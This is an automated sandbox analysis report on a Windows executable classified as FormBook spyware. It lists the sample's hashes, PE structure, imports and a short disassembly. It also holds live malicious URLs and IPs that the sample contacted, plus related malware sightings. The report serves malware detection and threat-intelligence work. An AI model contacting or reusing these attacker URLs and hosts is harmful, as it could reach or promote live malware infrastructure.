http://www.ophthalmo.cloud/mgg3/ | 0% | Avira URL Cloud | safe
http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 | 100% | Avira URL Cloud | malware
http://www.healthyloveforall.net/r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== | 0% | Avira URL Cloud | safe
http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== | 100% | Avira URL Cloud | malware
http://www.ngmr.xyz | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.ophthalmo.cloud | 217.160.0.207 | true | false | | unknown
www.ngmr.xyz | 54.67.87.110 | true | true | | unknown
zz82x.top | 38.47.232.196 | true | false | | unknown
healthyloveforall.net | 3.33.130.190 | true | false | | unknown
www.healthyloveforall.net | unknown | unknown | true | | unknown
www.zz82x.top | unknown | unknown | true | | unknown
www.bonusgame2024.online | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.ngmr.xyz/qj8y/?DTs4CD4=VLsx0gmXQ4Y/FgugnqZTvhP9ZMzds9qWdo+Du/rvWhX0yMPY213bdk6OAmkXBQAvHZvuSU6Z1Lmt8KkEin8FkCRkth5DL64qsZwfe0mtTtD39/jv9X5U82qLTQbZ+JYXlg==&v4=NRh8 | false | Avira URL Cloud: malware | unknown
http://www.ngmr.xyz/qj8y/ | false | Avira URL Cloud: malware | unknown
http://www.zz82x.top/fk06/ | false | Avira URL Cloud: malware | unknown
http://www.ophthalmo.cloud/mgg3/?DTs4CD4=gEC8KgLUidSdu/LaJDm0wdgPKykh22cq0AnLcRTEvs4H+h+Cn5seN/p6ZNIXUcjC7qbBK+lucO22lGJyLeY23gB1m4CBXHBSkrnrwKbx/qmY6AwmTWdie10g6VbJmKkWlw==&v4=NRh8 | false | Avira URL Cloud: safe | unknown
http://www.ophthalmo.cloud/mgg3/ | false | Avira URL Cloud: safe | unknown
http://www.healthyloveforall.net/r22w/?v4=NRh8&DTs4CD4=EsRXX7vEnUJAP459o9EPGhG/Za1TDqKo9/nSY7LZO6ky9vo/5zux77ZaoqJdw57Nhrisf5e1C3TQFLNLiNcqIHJwhSyssg2wbtb6j1AMMcve2PeTzyq3dg5968Ye3A3R7Q== | false | Avira URL Cloud: safe | unknown
http://www.zz82x.top/fk06/?v4=NRh8&DTs4CD4=6yamV9jmlYISo7pFsUNUJnURbxlWMYSXh3BqDS1TUCORGSKgOxEODjfkqzZEFLLIdUGYwb6HBQxj6hxrw3bE5aW7dF6zoZiXL70TyEdlD9ZsDXa5xNUzKEaTljshjAVXAQ== | false | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://ac.ecosia.org/autocomplete?q= | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ngmr.xyz | WNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
38.47.232.196 | zz82x.top | United States | 174 | COGENT-174US | false
54.67.87.110 | www.ngmr.xyz | United States | 16509 | AMAZON-02US | true
217.160.0.207 | www.ophthalmo.cloud | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | false
3.33.130.190 | healthyloveforall.net | United States | 8987 | AMAZONEXPANSIONGB | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1569366
Start date and time: 2024-12-05 18:20:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: s7Okni1gfE.exe (renamed because the original name is a hash value)
Original Sample Name: fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@5/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 49
• Number of non-executed functions: 296
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target WNGaDiurNI.exe, PID 5316 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: s7Okni1gfE.exe
Time | Type | Description
12:22:35 | API Interceptor | 611508x Sleep call for process: clip.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
38.47.232.196 | jeez.exe | malicious | FormBook | www.zz82x.top/fk06/
38.47.232.196 | 3wgZ0nlbTe.exe | malicious | FormBook | www.zz82x.top/jxne/
38.47.232.196 | RFQ REF-JTCAJC-QINHP5-TIS-L0009- (AL DHAFRA) AL JABER - SUPPLY.exe | malicious | FormBook | www.zz82x.top/jxne/
38.47.232.196 | w64HYOhfv1.exe | malicious | FormBook | www.zz82x.top/ak5l/
38.47.232.196 | enkJ6J7dAn.exe | malicious | FormBook | www.zz82x.top/ak5l/
38.47.232.196 | Enquiry.exe | malicious | FormBook | www.zz82x.top/ak5l/
38.47.232.196 | Purchase Order_ AEPL-2324-1126.exe | malicious | FormBook | www.zz82x.top/2lu6/
38.47.232.196 | x.exe | malicious | FormBook | www.zz82x.top/ym8o/
38.47.232.196 | bin.exe | malicious | FormBook | www.zz82x.top/ym8o/
54.67.87.110 | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | www.ngmr.xyz/ntib/
54.67.87.110 | jeez.exe | malicious | FormBook | www.ngmr.xyz/qj8y/
54.67.87.110 | -pdf.bat.exe | malicious | FormBook | www.ngmr.xyz/txr6/
54.67.87.110 | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | www.ngmr.xyz/txr6/
54.67.87.110 | AUG 2024 SOA.exe | malicious | FormBook | www.teenageoverload.xyz/tk11/
54.67.87.110 | DN.exe | malicious | FormBook | www.teenageoverload.xyz/tk11/
54.67.87.110 | Debit note Jan-Jul 2024.exe | malicious | FormBook | www.teenageoverload.xyz/tk11/
54.67.87.110 | ZRaWv2lX6l.exe | malicious | FormBook | www.3937981.xyz/enuj/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.ophthalmo.cloud | jeez.exe | malicious | FormBook | 217.160.0.207
www.ophthalmo.cloud | sa7Bw41TUq.exe | malicious | FormBook | 217.160.0.207
www.ngmr.xyz | Purchase_Order_pdf.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | rHSBCBank_Paymentswiftcpy.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | jeez.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | -pdf.bat.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | z4Shipping_document_pdf.exe | malicious | FormBook | 54.67.87.110
www.ngmr.xyz | UMOWA_PD.BAT.exe | malicious | FormBook, GuLoader | 54.67.87.110
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | fmlgbgc2p5.exe | malicious | Neconyd | 52.34.198.229
AMAZON-02US | spc.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | cOviNFmw21.exe | malicious | Neconyd | 52.34.198.229
AMAZON-02US | https://ln5.sync.com/dl/3c61e3b30#gum48d7j-5vgyh9gy-tcjv9rp4-ffxvqp5f | malicious | Unknown | 15.222.106.233
AMAZON-02US | https://tippfloorcovering-my.sharepoint.com/:f:/g/personal/inderjeet_tippfloor_com/EpEIzIGDzrlMs2z8rWgki5MBO5-d64iEaOqqeF3ulFqTiw?e=T39wgl | malicious | Unknown | 108.158.75.11
AMAZON-02US | http://kitces.emlnk1.com | malicious | Unknown | 13.227.9.168
AMAZON-02US | https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/ | malicious | Unknown | 13.250.84.149
AMAZON-02US | https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBD | malicious | HTMLPhisher | 63.32.181.175
AMAZON-02US | mpsl.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | https://sendgb.com/dxukcl49bIj?utm_medium=mvC3BJ1YMhqe8zn | malicious | HTMLPhisher | 52.48.36.35
COGENT-174US | f5TWdT5EAc.exe | malicious | Phorpiex, RHADAMANTHYS, Xmrig | 38.224.37.24
COGENT-174US | https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/ | malicious | Unknown | 38.91.45.7
COGENT-174US | VIP-#U4f1a#U5458#U7248.exe | malicious | BlackMoon | 114.114.114.114
COGENT-174US | New quotation request.exe | malicious | FormBook | 38.47.232.202
COGENT-174US | SRT68.exe | malicious | FormBook | 154.23.184.207
COGENT-174US | mipsel.nn.elf | malicious | Mirai, Okiru | 149.51.18.106
COGENT-174US | reduce.exe | malicious | GO Backdoor | 38.180.205.164
COGENT-174US | powerpc.elf | malicious | Gafgyt, Mirai | 149.6.31.140
COGENT-174US | armv4l.elf | malicious | Gafgyt, Mirai | 38.0.95.125
COGENT-174US | mips.elf | malicious | Gafgyt, Mirai | 38.168.56.189
ONEANDONE-ASBrauerstrasse48DE | sparc.nn.elf | malicious | Mirai, Okiru | 74.208.53.196
ONEANDONE-ASBrauerstrasse48DE | FR65 380 071 464.docx | malicious | Unknown | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | FR65 380 071 464.docx | malicious | Unknown | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | togiveme.doc | malicious | Remcos | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | nicetomeetyougreatthignsgivenmeback.hta | malicious | Cobalt Strike, HTMLPhisher | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | cUxXrdUvYR.rtf | malicious | Remcos | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | Amoxycillin Trihydrate Powder.docx.doc | malicious | Remcos | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | teste.ppc.elf | malicious | Gafgyt, Mirai, Moobot, Okiru | 82.223.130.227
ONEANDONE-ASBrauerstrasse48DE | UVIxNxvzCl.rtf | malicious | Unknown | 217.160.114.212
ONEANDONE-ASBrauerstrasse48DE | 6PAuIAUnwm.doc | malicious | Unknown | 217.160.114.212
                                          No context
                                          No context
Process: C:\Windows\SysWOW64\clip.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1209886597424439
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5: EFD26666EAE0E87B32082FF52F9F4C5E
SHA1: 603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256: 67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512: 28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious: false
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\s7Okni1gfE.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.99254067202499
Encrypted: true
SSDEEP: 6144:WTJrXNltbv65AK99qKCulsT6ii0ZgG1/Fq8MtYr+lzw:ktvM9k00VSG1/sb+czw
MD5: 61AB21AD38915EA1ED756131C057630A
SHA1: BD0079D60AD4C8C58CC1514EEA731D1B09FBDAFE
SHA-256: 7A3EF87E4B100FE084642807428002A932387745D7BC4C800779F471E97DDA2F
SHA-512: 8B42F86531959EAD6C317EBFE18F562BFF5BA43E8433CCB7B78522D7BFD7724645193BA16A7FE6232302E80085BE97ED66F40FBEFB0A5B3E35D60E3A15B0B623
Malicious: false
Reputation: low
Process: C:\Users\user\Desktop\s7Okni1gfE.exe
File Type: data
Category: dropped
Size (bytes): 287232
Entropy (8bit): 7.99254067202499
Encrypted: true
SSDEEP: 6144:WTJrXNltbv65AK99qKCulsT6ii0ZgG1/Fq8MtYr+lzw:ktvM9k00VSG1/sb+czw
MD5: 61AB21AD38915EA1ED756131C057630A
SHA1: BD0079D60AD4C8C58CC1514EEA731D1B09FBDAFE
SHA-256: 7A3EF87E4B100FE084642807428002A932387745D7BC4C800779F471E97DDA2F
SHA-512: 8B42F86531959EAD6C317EBFE18F562BFF5BA43E8433CCB7B78522D7BFD7724645193BA16A7FE6232302E80085BE97ED66F40FBEFB0A5B3E35D60E3A15B0B623
Malicious: false
Reputation: low
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.160445263760609
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: s7Okni1gfE.exe
File size: 1'226'752 bytes
MD5: 19730719a742ee889c6bd0b9e635d234
SHA1: bdf8492135d88c88050319d017cbb49779f81f59
SHA256: fb5a580f87999b4acfc3088dfcde8a710d620c005df30cfa0bca94bf3bcdbb89
SHA512: d7d6e925602fd986ec03d9a88e8baab3b636cad77d11649ae24a780b73a6640e75da7f7a650ffb56297ad4c208fd988e2717ae8620436a75e48e28dcd3be0afe
SSDEEP: 24576:Ftb20pkaCqT5TBWgNQ7a+TTqyCfUPH/NZ/6A:2Vg5tQ7a+T2yCU/VR5
TLSH: 0445DF2373DD8364C3B25273BA26B741AEBF782506B5F56B2FD4093DB820162521E673
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x6747B806 [Thu Nov 28 00:23:34 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
                                          File Version Minor:1
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:1
                                          Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                          Instruction
                                          call 00007F0718BBA1FFh
                                          jmp 00007F0718BAD214h
                                          int3
                                          int3
                                          push edi
                                          push esi
                                          mov esi, dword ptr [esp+10h]
                                          mov ecx, dword ptr [esp+14h]
                                          mov edi, dword ptr [esp+0Ch]
                                          mov eax, ecx
                                          mov edx, ecx
                                          add eax, esi
                                          cmp edi, esi
                                          jbe 00007F0718BAD39Ah
                                          cmp edi, eax
                                          jc 00007F0718BAD6FEh
                                          bt dword ptr [004C0158h], 01h
                                          jnc 00007F0718BAD399h
                                          rep movsb
                                          jmp 00007F0718BAD6ACh
                                          cmp ecx, 00000080h
                                          jc 00007F0718BAD564h
                                          mov eax, edi
                                          xor eax, esi
                                          test eax, 0000000Fh
                                          jne 00007F0718BAD3A0h
                                          bt dword ptr [004BA370h], 01h
                                          jc 00007F0718BAD870h
                                          bt dword ptr [004C0158h], 00000000h
                                          jnc 00007F0718BAD53Dh
                                          test edi, 00000003h
                                          jne 00007F0718BAD54Eh
                                          test esi, 00000003h
                                          jne 00007F0718BAD52Dh
                                          bt edi, 02h
                                          jnc 00007F0718BAD39Fh
                                          mov eax, dword ptr [esi]
                                          sub ecx, 04h
                                          lea esi, dword ptr [esi+04h]
                                          mov dword ptr [edi], eax
                                          lea edi, dword ptr [edi+04h]
                                          bt edi, 03h
                                          jnc 00007F0718BAD3A3h
                                          movq xmm1, qword ptr [esi]
                                          sub ecx, 08h
                                          lea esi, dword ptr [esi+08h]
                                          movq qword ptr [edi], xmm1
                                          lea edi, dword ptr [edi+08h]
                                          test esi, 00000007h
                                          je 00007F0718BAD3F5h
                                          bt esi, 03h
                                          jnc 00007F0718BAD448h
                                          movdqa xmm1, dqword ptr [esi+00h]
                                          Programming Language:
                                          • [ C ] VS2008 SP1 build 30729
                                          • [IMP] VS2008 SP1 build 30729
                                          • [ASM] VS2012 UPD4 build 61030
                                          • [RES] VS2012 UPD4 build 61030
                                          • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x627b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x127000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x627b0 | 0x62800 | f9ca3c094c45704b0f7ea5e4f275417b | False | 0.9338019511421319 | data | 7.90575585682048 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x127000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xca038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xca4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xca4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcaa84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc7b8 | 0x59ab5 | data | | | 1.0003294444368815
RT_GROUP_ICON | 0x126270 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1262e8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1262fc | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x126310 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x126324 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x126400 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
